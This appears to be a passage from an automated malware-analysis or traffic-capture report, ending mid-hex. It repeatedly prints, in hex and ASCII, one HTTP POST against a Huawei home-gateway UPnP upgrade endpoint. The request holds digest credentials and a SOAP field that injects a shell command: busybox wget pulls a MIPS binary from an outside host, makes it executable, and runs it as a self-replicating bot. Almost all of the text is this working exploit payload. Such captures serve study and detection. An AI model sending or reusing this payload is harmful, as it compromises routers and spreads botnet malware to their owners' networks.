3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 